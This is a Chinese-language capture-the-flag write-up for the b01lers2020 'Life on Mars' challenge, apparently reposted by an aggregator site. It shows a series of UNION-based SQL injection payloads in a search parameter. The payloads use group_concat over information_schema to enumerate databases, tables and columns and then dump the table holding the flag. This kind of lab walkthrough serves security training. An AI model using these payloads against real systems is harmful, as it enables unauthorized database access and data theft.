[b01lers2020]Life on Mars
Posted F1ght!!
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[b01lers2020]Life on Mars相关的知识,希望对你有一定的参考价值。
界面如下,点击可以看到各种信息,讲的是火星上的事物:
扫描一遍,没有发现任何东西:
并没有备份文件,猜测可能是一些框架的注入之类的,
在各页面抓包查看是否有可疑传参:
某一个页面,看到有类似查询的参数:
传参的数据如果是地名,则显示json形式的页面信息,尝试注入:
通过这个形式显示,信息:
尝试:
/query?search=amazonis_planitia union select version(),database()
将表名聚合在一起:爆出表名
对了,下面这是最常见的对没有过滤的sql注入进行查找的典型payload,用group_concat把某一信息聚合在一起,同时是从information_schema中查找,其是mysql自带的记录数据库元组字符规则的数据库,带有各种信息:
可以找到用户自己定义的表:
/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'
查表:
看不出什么,还是先爆其他的吧:
/query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.schemata
还是直接上代码爆出库名,和之前多出了两个库:
有个alien_code,可以看看;
/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'alien_code'
只有一个表叫’code’
继续查询表中字段:
/query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name = 'code'
有code和id两个字段,直接去code里面找:
/query?search=amazonis_planitia union select 1,group_concat(code) from alien_code.code
找到flag:
以上是关于[b01lers2020]Life on Mars的主要内容,如果未能解决你的问题,请参考以下文章
BUUCTF-[b01lers2020]Life on Mars